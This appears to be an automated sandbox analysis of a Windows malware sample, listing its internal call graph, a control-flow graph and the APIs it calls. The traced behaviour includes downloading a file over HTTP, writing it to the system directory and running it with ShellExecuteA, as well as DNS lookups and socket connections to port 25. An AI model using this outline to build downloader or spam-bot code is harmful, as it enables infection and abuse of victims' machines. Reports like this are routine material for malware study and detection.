1315100f 11776->11775 11777 13144c1f ctype 3 API calls 11776->11777 11777->11775 11778->11776 11779 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 11778->11779 11779->11778 11781 13151cb5 11780->11781 11783 13151cc2 11780->11783 11782 13144fe9 HeapAlloc 11781->11782 11782->11783 11783->11694 11785 13145006 3 API calls 11784->11785 11786 13151d00 11785->11786 11786->11698 11788 131509a9 11787->11788 11789 131509b6 11787->11789 11790 13142f79 lstrlenA 11788->11790 11789->11702 11790->11789 11792 13144fe9 HeapAlloc 11791->11792 11793 13151c85 11792->11793 11793->11735 11795 13151d38 11794->11795 11797 13151d34 11794->11797 11796 13145006 3 API calls 11795->11796 11796->11797 11797->11735 11798->11735 11800 131509d6 11799->11800 11802 131509e3 11799->11802 11801 13142f79 lstrlenA 11800->11801 11801->11802 11802->11722 11804 1314d8a1 Sleep 11803->11804 11805 1314d579 11803->11805 11814 1314d60e 11804->11814 11806 13144ea1 EnterCriticalSection 11805->11806 11807 1314d584 11806->11807 11808 13144ea1 EnterCriticalSection 11807->11808 11813 1314d58f 11808->11813 11809 13144c1f ctype 3 API calls 11810 1314d5f6 11809->11810 11812 13144fe9 HeapAlloc 11810->11812 11811 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 11811->11813 11827 1314d602 11812->11827 11813->11811 11816 1314d5e7 11813->11816 11814->11751 11815 13145107 2 API calls 11817 1314d621 lstrlenA 11815->11817 11816->11809 11817->11827 11818 13144d5c IsBadReadPtr 11818->11827 11819 1314d879 11820 13144eb3 LeaveCriticalSection 11819->11820 11821 1314d892 11820->11821 11822 13144eb3 LeaveCriticalSection 11821->11822 11822->11814 11823 1314d71d inet_ntoa 11824 13142f79 lstrlenA 11823->11824 11825 1314d730 wsprintfA 11824->11825 11825->11827 11826 13144fe9 HeapAlloc 11826->11827 11827->11814 11827->11815 11827->11818 11827->11819 11827->11823 11827->11826 11828 13144dc2 IsBadWritePtr IsBadReadPtr 11827->11828 11828->11827 11830 1314df4b 11829->11830 11831 1314dc9e 11829->11831 11830->11751 11831->11830 11832 13144ea1 EnterCriticalSection 11831->11832 11833 1314dcba 11832->11833 11834 13144ea1 EnterCriticalSection 11833->11834 11835 1314dcc5 11834->11835 11952 1314d2c6 11835->11952 11838 1314ddb8 11840 13144eb3 LeaveCriticalSection 11838->11840 11839 1314dcf7 11982 131507ec 11839->11982 11842 1314ddc4 11840->11842 11845 13144eb3 LeaveCriticalSection 11842->11845 11843 1314dd03 11843->11838 11844 131500d1 3 API calls 11843->11844 11847 1314ddb2 11844->11847 11848 1314ddcf 11845->11848 11846 13142f79 lstrlenA 11865 1314dd08 11846->11865 11849 13144c6b ctype 3 API calls 11847->11849 11850 13142f79 lstrlenA 11848->11850 11849->11838 11851 1314dddf 11850->11851 11993 13150732 11851->11993 11854 13144d5c IsBadReadPtr 11856 1314de0a 11854->11856 11855 131506ce lstrcmpA lstrcmpA 11855->11865 11856->11830 11857 13145107 2 API calls 11856->11857 11867 1314de1d 11857->11867 11858 131507ec 19 API calls 11858->11865 11859 1314df40 11860 13144c1f ctype 3 API calls 11859->11860 11860->11830 11861 1314de31 StrStrA 11861->11867 11863 13142f79 lstrlenA 11866 1314de5a StrStrA 11863->11866 11864 13144c6b ctype 3 API calls 11864->11865 11865->11843 11865->11846 11865->11855 11865->11858 11865->11864 11987 131500d1 11865->11987 11866->11867 11867->11859 11867->11861 11867->11863 11869 1314debd GetSystemDirectoryA GetTickCount 11867->11869 11999 13145036 InternetOpenA 11867->11999 11870 13142f79 lstrlenA 11869->11870 11871 1314deef wnsprintfA 11870->11871 12009 13144b5d OpenFile 11871->12009 11873 1314df11 11874 13142f79 lstrlenA 11873->11874 11875 1314df2c ShellExecuteA 11874->11875 11875->11867 11877 13144ea1 EnterCriticalSection 11876->11877 11878 1314d8f9 11877->11878 11879 13144ea1 EnterCriticalSection 11878->11879 11880 1314d904 11879->11880 12012 1314a91a 11880->12012 11883 1314dabe 11884 13144eb3 LeaveCriticalSection 11883->11884 11886 1314dac9 11884->11886 11885 1314d944 12019 13148e54 11885->12019 11888 13144eb3 LeaveCriticalSection 11886->11888 11917 1314da8a 11888->11917 11889 1314d954 11890 1314da8e 11889->11890 12030 13149044 11889->12030 12132 1314aba0 11890->12132 11894 13144eb3 LeaveCriticalSection 11895 1314daa1 11894->11895 11896 13144eb3 LeaveCriticalSection 11895->11896 11898 1314daac Sleep 11896->11898 11897 1314d972 11897->11890 12044 13149100 11897->12044 11898->11917 11900 1314d9ca 11900->11890 12050 131491b7 11900->12050 11912 1314da6c 11912->11890 11913 1314da74 11912->11913 11914 13144eb3 LeaveCriticalSection 11913->11914 11915 1314da7f 11914->11915 11916 13144eb3 LeaveCriticalSection 11915->11916 11916->11917 11917->11751 11919 1314d542 11918->11919 11920 1314d54c GetTickCount 11918->11920 11919->11920 12428 1314d00a 11920->12428 11924 131451e8 18 API calls 11923->11924 11925 1314d270 11924->11925 12443 1314341a DeleteCriticalSection DeleteCriticalSection 11925->12443 11929 1314d1c8 11928->11929 11949 1314d25b 11928->11949 11930 1314d20e 11929->11930 11931 1314d1d8 11929->11931 11932 13144ea1 EnterCriticalSection 11930->11932 11933 13144ea1 EnterCriticalSection 11931->11933 11934 1314d213 11932->11934 11935 1314d1dd 11933->11935 11936 13144ea1 EnterCriticalSection 11934->11936 11937 13144ea1 EnterCriticalSection 11935->11937 11946 1314d21e 11936->11946 11938 1314d1e8 11937->11938 12450 1314586b 11938->12450 11939 1314d245 11941 13144eb3 LeaveCriticalSection 11939->11941 11944 1314d250 11941->11944 11943 1314aba0 3 API calls 11943->11946 11947 13144eb3 LeaveCriticalSection 11944->11947 11945 13144eb3 LeaveCriticalSection 11948 1314d1fe 11945->11948 11946->11939 11946->11943 11947->11949 11950 13144eb3 LeaveCriticalSection 11948->11950 11949->11751 11951 1314d209 11950->11951 11951->11751 11953 1314d2d7 11952->11953 11954 1314d2de 11952->11954 11953->11838 11953->11839 11953->11865 11954->11953 11955 13144fe4 HeapAlloc 11954->11955 11956 1314d2f1 11955->11956 11956->11953 11957 1314d4df 11956->11957 11960 13142f79 lstrlenA 11956->11960 11966 131504ae 18 API calls 11956->11966 11967 13142f79 lstrlenA 11956->11967 11969 13142f79 lstrlenA 11956->11969 11977 13142f79 lstrlenA 11956->11977 11979 131506ce lstrcmpA lstrcmpA 11956->11979 11980 13143e2a 9 API calls 11956->11980 11981 13144fe9 HeapAlloc 11956->11981 11958 13142f79 lstrlenA 11957->11958 11959 1314d4ed 11958->11959 11961 13150795 19 API calls 11959->11961 11960->11956 11962 1314d4f9 11961->11962 11963 13142f79 lstrlenA 11962->11963 11964 1314d50a 11963->11964 11965 13150795 19 API calls 11964->11965 11965->11953 11966->11956 11968 1314d35e lstrcmpA 11967->11968 11968->11956 11970 1314d3ab lstrcmpA 11969->11970 11974 1314d3b9 11970->11974 11971 13142f79 lstrlenA 11973 1314d3e3 lstrcmpA 11971->11973 11972 13142f79 lstrlenA 11972->11974 11973->11956 11974->11971 11974->11972 11975 131506ce 2 API calls 11974->11975 11976 1314d3d0 inet_addr 11975->11976 11976->11956 11978 1314d3fc lstrcmpA 11977->11978 11978->11956 11979->11956 11980->11956 11981->11956 11983 13150864 11982->11983 11984 131507ff 11982->11984 11983->11843 11984->11983 11985 13150795 19 API calls 11984->11985 11986 131504ae 18 API calls 11984->11986 11985->11984 11986->11984 11991 131500e2 11987->11991 11992 13150143 11987->11992 11988 13144c1f ctype 3 API calls 11989 1315014d 11988->11989 11989->11865 11990 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 11990->11991 11991->11990 11991->11992 11992->11988 11994 1315073c 11993->11994 11998 1314ddee 11993->11998 11995 1315040e lstrcmpA 11994->11995 11996 13150764 11994->11996 11994->11998 11995->11994 11997 13150450 lstrcmpA 11996->11997 11997->11998 11998->11830 11998->11854 12000 1314505b InternetConnectA 11999->12000 12004 13145054 11999->12004 12001 13145072 HttpOpenRequestA 12000->12001 12000->12004 12002 13145089 HttpSendRequestA 12001->12002 12001->12004 12003 13145098 HttpQueryInfoA 12002->12003 12002->12004 12005 131450b5 12003->12005 12004->11867 12006 13144fe9 HeapAlloc 12005->12006 12007 131450d5 InternetReadFile 12006->12007 12007->12004 12008 131450f1 InternetCloseHandle 12007->12008 12008->12004 12010 13144b96 GetLastError SetFilePointer WriteFile CloseHandle 12009->12010 12011 13144b83 OpenFile 12009->12011 12010->11873 12011->12010 12013 1314a92a 12012->12013 12017 1314a925 12012->12017 12014 1314a965 12013->12014 12015 1314a94e 12013->12015 12013->12017 12014->12017 12152 1314a8ea 12014->12152 12143 1314a7f6 12015->12143 12017->11883 12017->11885 12020 13148e5d 12019->12020 12022 13148e62 12019->12022 12020->11889 12021 13148e71 12021->11889 12022->12021 12023 13146f21 4 API calls 12022->12023 12024 13148e88 12023->12024 12024->12021 12025 13146f21 4 API calls 12024->12025 12026 13148ea2 12025->12026 12026->12021 12027 13146f21 4 API calls 12026->12027 12028 13148ebc 12027->12028 12028->12021 12029 13146f21 4 API calls 12028->12029 12029->12021 12032 13149055 12030->12032 12034 1314905d 12030->12034 12031 13142f79 lstrlenA 12033 131490d7 12031->12033 12032->11897 12035 13148fc0 15 API calls 12033->12035 12034->12032 12036 13142f79 lstrlenA 12034->12036 12043 131490ab 12034->12043 12037 131490e1 12035->12037 12038 13149098 12036->12038 12039 13146f21 4 API calls 12037->12039 12196 13148fc0 12038->12196 12039->12032 12041 131490a2 12042 13146f21 4 API calls 12041->12042 12042->12043 12043->12031 12045 1314910e 12044->12045 12046 13149109 12044->12046 12047 13149122 12045->12047 12048 13148fc0 15 API calls 12045->12048 12049 13146f21 4 API calls 12045->12049 12046->11900 12047->11900 12048->12045 12049->12045 12051 131491ca 12050->12051 12056 131491c5 12050->12056 12052 13142f79 lstrlenA 12051->12052 12051->12056 12053 131491eb 12052->12053 12054 13146b8b 11 API calls 12053->12054 12055 131491f5 12054->12055 12055->12056 12057 13142f79 lstrlenA 12055->12057 12056->11890 12064 13148f65 12056->12064 12058 13149204 12057->12058 12059 13148fc0 15 API calls 12058->12059 12060 1314920e 12059->12060 12060->12056 12061 13142f79 lstrlenA 12060->12061 12062 13149223 12061->12062 12063 13146f21 4 API calls 12062->12063 12063->12056 12065 13148f75 12064->12065 12066 13148f70 12064->12066 12065->12066 12205 13148954 12065->12205 12066->11890 12068 1314a9a1 12066->12068 12069 1314a9b7 12068->12069 12089 1314a9af 12068->12089 12070 13144fe9 HeapAlloc 12069->12070 12069->12089 12071 1314a9e9 12070->12071 12072 13144fe9 HeapAlloc 12071->12072 12071->12089 12079 1314aa03 12072->12079 12073 1314aaca 12074 13144fe4 HeapAlloc 12073->12074 12082 1314aadb 12073->12082 12074->12082 12076 13144fe4 HeapAlloc 12076->12082 12077 13145107 2 API calls 12077->12079 12078 13144c6b ctype 3 API calls 12078->12082 12079->12073 12079->12077 12081 1314aa67 CharLowerA 12079->12081 12079->12089 12084 13145107 2 API calls 12081->12084 12082->12076 12082->12078 12083 1314ab27 12082->12083 12213 1314e54e 12082->12213 12225 1314e4d1 12082->12225 12085 13144c1f ctype 3 API calls 12083->12085 12084->12079 12090 1314ab32 12085->12090 12086 1314ab8b 12087 13144c1f ctype 3 API calls 12086->12087 12087->12089 12089->11890 12092 13149240 12089->12092 12090->12086 12091 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 12090->12091 12237 1314e5c4 12090->12237 12091->12090 12093 1314924e 12092->12093 12098 13149256 12092->12098 12093->11890 12115 1315086b 12093->12115 12094 13145006 3 API calls 12094->12098 12095 13145107 IsBadReadPtr HeapAlloc 12095->12098 12096 13142f79 lstrlenA 12097 1314939b wnsprintfA 12096->12097 12101 13148fc0 15 API calls 12097->12101 12098->12093 12098->12094 12098->12095 12098->12096 12099 13149412 GetTickCount 12098->12099 12102 13144fe9 HeapAlloc 12098->12102 12110 13142f79 lstrlenA 12098->12110 12113 13142f79 lstrlenA 12098->12113 12114 13146f21 IsBadReadPtr HeapAlloc IsBadReadPtr HeapReAlloc 12098->12114 12100 13142f79 lstrlenA 12099->12100 12103 13149429 wnsprintfA 12100->12103 12104 131493b4 12101->12104 12102->12098 12105 13148fc0 15 API calls 12103->12105 12106 13146f21 4 API calls 12104->12106 12107 13142f79 lstrlenA 12104->12107 12105->12098 12106->12104 12108 131493d4 wnsprintfA 12107->12108 12109 13148fc0 15 API calls 12108->12109 12109->12098 12111 13149534 wnsprintfA 12110->12111 12112 13148fc0 15 API calls 12111->12112 12112->12098 12113->12098 12114->12098 12116 13150879 12115->12116 12118 1314da4b 12115->12118 12117 1314d2c6 32 API calls 12116->12117 12116->12118 12119 131508bb 12117->12119 12118->11890 12125 1314a603 12118->12125 12119->12118 12120 131507ec 19 API calls 12119->12120 12121 131508df 12120->12121 12122 131500d1 3 API calls 12121->12122 12123 131508e6 12122->12123 12124 13144c6b ctype 3 API calls 12123->12124 12124->12118 12126 1314a612 12125->12126 12130 1314a616 12125->12130 12126->11912 12127 1314a706 12127->11912 12130->12127 12131 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 12130->12131 12254 13148a00 12130->12254 12282 13149591 12130->12282 12131->12130 12133 1314abbb 12132->12133 12137 1314abb7 12132->12137 12134 1314a86a 3 API calls 12133->12134 12140 1314abc1 12134->12140 12135 1314ac0d 12136 13144c1f ctype 3 API calls 12135->12136 12136->12137 12137->11894 12138 1314e54e 3 API calls 12138->12140 12139 1314abff 12141 13144c1f ctype 3 API calls 12139->12141 12140->12135 12140->12137 12140->12138 12140->12139 12142 13144c6b ctype 3 API calls 12140->12142 12141->12135 12142->12140 12144 1314a803 12143->12144 12145 1314a7ff 12143->12145 12146 13144fe9 HeapAlloc 12144->12146 12145->12017 12147 1314a80f 12146->12147 12159 1314a73e 12147->12159 12150 1314a847 12150->12017 12151 13145006 3 API calls 12151->12150 12153 1314a900 12152->12153 12154 1314a8fc 12152->12154 12179 1314a86a 12153->12179 12154->12017 12157 1314a73e 6 API calls 12158 1314a911 12157->12158 12158->12017 12160 1314a756 12159->12160 12161 1314a74f 12159->12161 12162 13144fe9 HeapAlloc 12160->12162 12161->12150 12161->12151 12163 1314a75f 12162->12163 12164 13144fe9 HeapAlloc 12163->12164 12165 1314a77e 12164->12165 12166 1314a789 wnsprintfA 12165->12166 12168 13142f79 lstrlenA 12165->12168 12169 13146f21 4 API calls 12165->12169 12171 1314a7ca 12165->12171 12173 13146478 12166->12173 12168->12165 12169->12165 12170 13142f79 lstrlenA 12170->12171 12171->12161 12171->12170 12172 13146478 2 API calls 12171->12172 12172->12171 12174 13146484 12173->12174 12175 13146488 12173->12175 12174->12165 12175->12174 12176 13144fe9 HeapAlloc 12175->12176 12177 1314649f 12176->12177 12177->12174 12178 13145107 2 API calls 12177->12178 12178->12174 12180 1314a87a 12179->12180 12187 1314a876 12179->12187 12189 13148df9 12180->12189 12183 13144c1f ctype 3 API calls 12188 1314a88e 12183->12188 12184 1314a8d1 12185 13144c1f ctype 3 API calls 12184->12185 12185->12187 12186 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 12186->12188 12187->12154 12187->12157 12188->12184 12188->12186 12192 13148e4b 12189->12192 12195 13148e05 12189->12195 12190 13148e41 12191 13144c1f ctype 3 API calls 12190->12191 12191->12192 12192->12183 12193 13148d18 3 API calls 12193->12195 12194 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 12194->12195 12195->12190 12195->12193 12195->12194 12197 13148fcd 12196->12197 12198 13148fc9 12196->12198 12197->12198 12199 13146b8b 11 API calls 12197->12199 12198->12041 12200 13148fde 12199->12200 12201 1314900c 12200->12201 12202 13145006 3 API calls 12200->12202 12201->12041 12203 13148ffd 12202->12203 12204 13146478 2 API calls 12203->12204 12204->12201 12206 13148965 12205->12206 12207 13148969 12205->12207 12206->12065 12207->12206 12208 13148988 12207->12208 12210 13142f79 lstrlenA 12207->12210 12208->12206 12209 13146f21 4 API calls 12208->12209 12209->12206 12211 1314897d 12210->12211 12212 13146478 2 API calls 12211->12212 12212->12208 12214 1314e558 12213->12214 12215 1314e594 12214->12215 12218 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 12214->12218 12216 13144c1f ctype 3 API calls 12215->12216 12217 1314e59d 12216->12217 12219 13144c1f ctype 3 API calls 12217->12219 12218->12214 12226 1314e541 12225->12226 12227 1314e4f3 12225->12227 12226->12082 12228 13144fe9 HeapAlloc 12227->12228 12229 1314e4fe 12228->12229 12230 13144fe9 HeapAlloc 12229->12230 12231 1314e50e 12230->12231 12238 1314e5d9 12237->12238 12246 1314e6a7 12237->12246 12239 1314e606 12238->12239 12240 1314e5e6 12238->12240 12238->12246 12246->12090 12255 13148a18 12254->12255 12265 13148a11 12254->12265 12256 13144d5c IsBadReadPtr 12255->12256 12255->12265 12279 13148a35 12256->12279 12257 13142f79 lstrlenA 12258 13148a57 StrStrIA 12257->12258 12265->12130 12267 131489a5 HeapAlloc IsBadReadPtr HeapReAlloc 12267->12279 12270 13148caf 12272 13144c1f ctype 3 API calls 12270->12272 12271 13144d5c IsBadReadPtr 12271->12279 12272->12265 12273 13142f79 lstrlenA 12274 13148b8e StrStrIA 12273->12274 12274->12279 12275 13148bcc StrStrIA 12275->12279 12276 13142f79 lstrlenA 12277 13148be9 wnsprintfA 12276->12277 12279->12257 12279->12265 12279->12267 12279->12270 12279->12271 12279->12273 12279->12275 12279->12276 12280 131489a5 3 API calls 12279->12280 12281 13148c43 StrStrIA 12280->12281 12281->12279 12283 131495a0 12282->12283 12284 1314960c StrStrA 12283->12284 12288 131495a8 12283->12288 12285 1314a5c5 12284->12285 12381 13149627 12284->12381 12287 131464fd 2 API calls 12285->12287 12285->12288 12286 1314962a StrStrA 12286->12285 12286->12381 12287->12288 12288->12130 12289 13142f79 lstrlenA 12291 131499c8 StrStrIA 12289->12291 12290 13142f79 lstrlenA 12295 1314a349 StrStrIA 12290->12295 12291->12381 12292 13149f75 StrChrA 12292->12381 12293 13142f79 lstrlenA 12297 13149e79 StrStrIA 12293->12297 12294 13142f79 lstrlenA 12299 13149aac lstrcmpA 12294->12299 12295->12381 12296 13142f79 lstrlenA 12304 1314a304 lstrcmpA 12296->12304 12297->12381 12298 13142f79 lstrlenA 12302 1314990a lstrcmpA 12298->12302 12299->12381 12300 13142f79 lstrlenA 12300->12381 12301 13142f79 lstrlenA 12309 13149f9c lstrcmpiA 12301->12309 12302->12381 12303 13142f79 lstrlenA 12310 13149a42 StrStrIA 12303->12310 12304->12381 12305 13142f79 lstrlenA 12311 1314a322 lstrcmpA 12305->12311 12306 13142f79 lstrlenA 12313 13149794 lstrcmpA 12306->12313 12307 13142f79 lstrlenA 12315 13149ccc StrStrIA 12307->12315 12308 13142f79 lstrlenA 12316 131498e0 lstrcmpiA 12308->12316 12310->12381 12311->12381 12312 13142f79 lstrlenA 12319 13149ca5 lstrcmpA 12312->12319 12313->12381 12314 13144fe9 HeapAlloc 12314->12381 12315->12381 12316->12381 12318 13149ac3 StrChrA 12318->12381 12319->12381 12321 13142f79 lstrlenA 12330 1314a0de lstrcmpiA 12321->12330 12323 13142f79 lstrlenA 12331 13149bb6 lstrcmpiA 12323->12331 12324 13142f79 lstrlenA 12332 13149ae6 lstrcmpiA 12324->12332 12325 13142f79 lstrlenA 12333 131497b6 lstrcmpA 12325->12333 12326 13142f79 lstrlenA 12334 1314a38f wnsprintfA 12326->12334 12328 13142f79 lstrlenA 12340 1314a2d5 lstrcmpiA 12328->12340 12330->12381 12331->12381 12332->12381 12333->12381 12334->12288 12334->12381 12335 13142f79 lstrlenA 12342 13149d04 lstrcmpA 12335->12342 12336 13142f79 lstrlenA 12343 131496e2 lstrcmpA 12336->12343 12337 1314a073 StrStrA 12337->12381 12339 13142f79 lstrlenA 12344 13149ec8 wnsprintfA 12339->12344 12340->12381 12341 13142f79 lstrlenA 12346 1314a105 StrStrIA 12341->12346 12343->12381 12344->12288 12344->12381 12345 13149938 wnsprintfA 12345->12381 12346->12381 12347 13145006 HeapAlloc IsBadReadPtr HeapReAlloc 12347->12381 12348 13148fc0 15 API calls 12348->12381 12349 13142f79 lstrlenA 12355 131497d8 lstrcmpA 12349->12355 12351 13142f79 lstrlenA 12357 13149b37 lstrcmpiA 12351->12357 12352 13142f79 lstrlenA 12358 13149c22 lstrcmpiA 12352->12358 12353 1314a577 StrStrA 12353->12285 12353->12286 12355->12381 12357->12381 12358->12381 12364 13142f79 lstrlenA 12370 131497fa lstrcmpA 12364->12370 12366 13149014 7 API calls 12366->12381 12369 13146ddf 7 API calls 12369->12381 12370->12381 12374 13142f79 lstrlenA 12377 1314a148 wnsprintfA 12374->12377 12375 13146b8b 11 API calls 12375->12381 12377->12288 12377->12381 12378 13142f79 lstrlenA 12382 1314981c lstrcmpA 12378->12382 12380 13142f79 lstrlenA 12383 13149e14 wnsprintfA 12380->12383 12381->12286 12381->12288 12381->12289 12381->12290 12381->12292 12381->12293 12381->12294 12381->12296 12381->12298 12381->12300 12381->12301 12381->12303 12381->12305 12381->12306 12381->12307 12381->12308 12381->12312 12381->12314 12381->12318 12381->12321 12381->12323 12381->12324 12381->12325 12381->12326 12381->12328 12381->12335 12381->12336 12381->12337 12381->12339 12381->12341 12381->12345 12381->12347 12381->12348 12381->12349 12381->12351 12381->12352 12381->12353 12381->12364 12381->12366 12381->12369 12381->12374 12381->12375 12381->12378 12381->12380 12386 13142f79 lstrlenA 12381->12386 12388 13142f79 lstrlenA 12381->12388 12390 13142f79 lstrlenA 12381->12390 12392 13146f21 IsBadReadPtr HeapAlloc IsBadReadPtr HeapReAlloc 12381->12392 12393 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 12381->12393 12394 13144e1f IsBadWritePtr IsBadWritePtr IsBadReadPtr 12381->12394 12399 13146d35 VirtualAlloc 12381->12399 12405 13146cc2 12381->12405 12412 13146eb5 12381->12412 12420 131464fd 12381->12420 12382->12381 12387 1314983e lstrcmpA 12386->12387 12387->12381 12389 13149860 lstrcmpA 12388->12389 12389->12381 12391 13149882 lstrcmpA 12390->12391 12391->12381 12392->12381 12393->12381 12394->12381 12400 13146d56 12399->12400 12401 13146dd8 12399->12401 12401->12381 12406 13146ccf 12405->12406 12407 13146ccb 12405->12407 12407->12381 12413 13146ec2 lstrlenA 12412->12413 12414 13146ebe 12412->12414 12414->12381 12421 13146506 12420->12421 12422 1314650a 12420->12422 12421->12381 12429 1314d171 12428->12429 12430 1314d028 12428->12430 12429->11751 12431 13142f79 lstrlenA 12430->12431 12432 1314d054 wnsprintfA 12431->12432 12433 13142f79 lstrlenA 12432->12433 12434 1314d094 wnsprintfA DnsQuery_A 12433->12434 12435 1314d0bf 12434->12435 12436 1314d158 GetLastError 12434->12436 12437 13142f79 lstrlenA 12435->12437 12436->12429 12438 1314d0cc StrStrIA 12437->12438 12439 1314d0e0 12438->12439 12440 13144dc2 2 API calls 12439->12440 12441 1314d122 12440->12441 12441->12429 12442 1314d135 DnsRecordListFree 12441->12442 12442->12429 12444 13143447 GetCurrentThreadId 12443->12444 12445 131434a0 ExitProcess 12443->12445 12446 1314345e 12444->12446 12447 13143464 OpenThread 12446->12447 12448 13143497 ExitThread 12446->12448 12447->12446 12449 13143474 TerminateThread CloseHandle Sleep 12447->12449 12449->12446 12451 13145aea 12450->12451 12463 1314587f 12450->12463 12451->11945 12452 13145adf 12453 13144c1f ctype 3 API calls 12452->12453 12453->12451 12454 1314aba0 3 API calls 12456 13145a9b 12454->12456 12455 13145006 3 API calls 12455->12463 12456->12452 12456->12454 12457 13144fe9 HeapAlloc 12457->12463 12460 13144fe4 HeapAlloc 12460->12463 12463->12451 12463->12455 12463->12456 12463->12457 12463->12460 12464 131509f7 12463->12464 12468 13151053 12463->12468 12473 13150a7d 12463->12473 12499 13143cca 12463->12499 12465 13150a0d 12464->12465 12466 13150a14 12465->12466 12467 131509fc lstrcmpA 12465->12467 12466->12463 12467->12465 12467->12466 12469 13144fe4 HeapAlloc 12468->12469 12470 1315105e 12469->12470 12471 13145107 2 API calls 12470->12471 12472 13151079 12471->12472 12472->12463 12474 13150a91 12473->12474 12475 13150a98 12473->12475 12474->12463 12476 13145006 3 API calls 12475->12476 12477 13150aa9 StrStrA 12476->12477 12478 13150afe 12477->12478 12479 13150ac9 12477->12479 12482 13144fe9 HeapAlloc 12478->12482 12480 13150b0d 12479->12480 12481 13150ad6 StrStrA 12479->12481 12484 13144d5c IsBadReadPtr 12480->12484 12481->12480 12483 13150ae4 CharUpperBuffA CharUpperBuffA 12481->12483 12482->12480 12483->12480 12485 13150b2a 12484->12485 12485->12474 12486 13144d5c IsBadReadPtr 12485->12486 12487 13150b45 12486->12487 12487->12474 12488 13144fe9 HeapAlloc 12487->12488 12489 13150b6b 12488->12489 12490 13144dc2 2 API calls 12489->12490 12491 13150b84 12490->12491 12491->12474 12492 13144fe9 HeapAlloc 12491->12492 12493 13150b9b 12492->12493 12494 13144dc2 2 API calls 12493->12494 12495 13150bb4 12494->12495 12495->12474 12511 13150a47 12495->12511 12498 13144c1f ctype 3 API calls 12498->12474 12500 13143cdf 12499->12500 12510 13143cd8 12499->12510 12501 13143cf4 12500->12501 12502 13143ce5 Sleep 12500->12502 12503 13143cf6 Sleep 12501->12503 12504 13143d06 12501->12504 12502->12500 12503->12501 12505 13144d5c IsBadReadPtr 12504->12505 12506 13143d17 12505->12506 12507 13144fe9 HeapAlloc 12506->12507 12506->12510 12508 13143d4c 12507->12508 12509 13145107 2 API calls 12508->12509 12509->12510 12510->12463 12512 13150a54 CharLowerA 12511->12512 12513 13150a50 12511->12513 12512->12513 12513->12474 12513->12498 12515 131519d0 12514->12515 12519 13151993 12514->12519 12516 131519e3 DeleteCriticalSection 12515->12516 12528 13151165 DeleteCriticalSection 12515->12528 12516->11767 12518 131513cf 7 API calls 12518->12519 12519->12515 12519->12518 12520 13151183 10 API calls 12519->12520 12521 13144c6b IsBadReadPtr IsBadReadPtr HeapFree ctype 12519->12521 12520->12519 12521->12519 12523 1314ac74 12522->12523 12527 1314ac3d 12522->12527 12523->11773 12524 1314ac62 12525 13144c1f ctype 3 API calls 12524->12525 12525->12523 12526 1314aba0 3 API calls 12526->12527 12527->12524 12527->12526 12529 13151176 12528->12529 12530 1315117c 12528->12530 12531 13144c6b ctype 3 API calls 12529->12531 12530->12516 12531->12530

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 1314e012-1314e074 GetSystemTime call 1314ffd0 GetTickCount * 2 3 1314e076 0->3 4 1314e07d-1314e080 0->4 3->4 5 1314e082-1314e0ba call 13144ea1 * 2 call 13145b7d call 13144eb3 * 2 4->5 6 1314e0bd-1314e0c3 4->6 5->6 7 1314e18c-1314e19d call 1314dae3 6->7 8 1314e0c9-1314e0d0 6->8 18 1314e297-1314e2d1 shutdown closesocket call 13142f79 call 131506ce 7->18 19 1314e1a3-1314e1b7 OpenMutexA 7->19 11 1314e0e5-1314e0f7 socket 8->11 12 1314e0d2-1314e0e0 shutdown closesocket 8->12 15 1314e0fd-1314e132 call 13142f79 call 131506ce 11->15 16 1314e31e-1314e34b ExitProcess GetTickCount 11->16 12->11 40 1314e134 15->40 41 1314e13b-1314e15a htons connect 15->41 27 1314e352-1314e380 call 13144d0b htons 16->27 18->4 51 1314e2d7-1314e319 call 13144c1f call 13144ea1 * 2 call 1314df53 call 13144eb3 * 2 18->51 23 1314e1c7-1314e1e8 call 13144c1f GetTickCount call 1314df98 19->23 24 1314e1b9-1314e1c1 CreateMutexA 19->24 23->4 54 1314e1ee-1314e20a call 13142f79 call 131506ce 23->54 24->23 43 1314e383-1314e389 27->43 40->41 46 1314e15c-1314e167 call 1314d177 41->46 47 1314e169-1314e174 GetLastError Sleep 41->47 49 1314e3e9 43->49 50 1314e38b-1314e3b5 call 13142f79 DnsQuery_A 43->50 56 1314e17a-1314e186 46->56 47->56 53 1314e3eb-1314e3f1 49->53 65 1314e3b7-1314e3db call 13144d0b DnsRecordListFree 50->65 66 1314e3e0-1314e3e7 50->66 51->4 61 1314e462-1314e46f 53->61 62 1314e3f3-1314e3f9 53->62 88 1314e20c-1314e218 closesocket 54->88 89 1314e21d-1314e249 call 13142f79 call 131506ce GetTickCount 54->89 56->4 56->7 71 1314e471-1314e478 61->71 72 1314e48a-1314e4aa call 13142f79 call 131506ce 61->72 68 1314e457-1314e460 62->68 69 1314e3fb-1314e43f socket setsockopt connect 62->69 65->66 66->43 66->49 68->53 68->61 76 1314e451-1314e452 closesocket 69->76 77 1314e441-1314e44c recv 69->77 79 1314e479-1314e47b 71->79 72->27 94 1314e4b0-1314e4b6 72->94 76->68 77->76 84 1314e484-1314e488 79->84 85 1314e47d 79->85 84->72 84->79 85->84 88->89 89->4 102 1314e24f-1314e28a Sleep call 13142f79 call 131506ce GetTickCount 89->102 94->27 97 1314e4bc-1314e4ca Sleep 94->97 97->94 100 1314e4cc 97->100 100->27 109 1314e28c-1314e292 102->109 109->4
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemTime.KERNEL32(?,00020000,76B5EEA0,00000000), ref: 1314E01F
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E03A
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E041
                                                                                                                                                                                • shutdown.WS2_32(?,00000002), ref: 1314E0D5
                                                                                                                                                                                • closesocket.WS2_32(?), ref: 1314E0E0
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 1314E0EA
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E13E
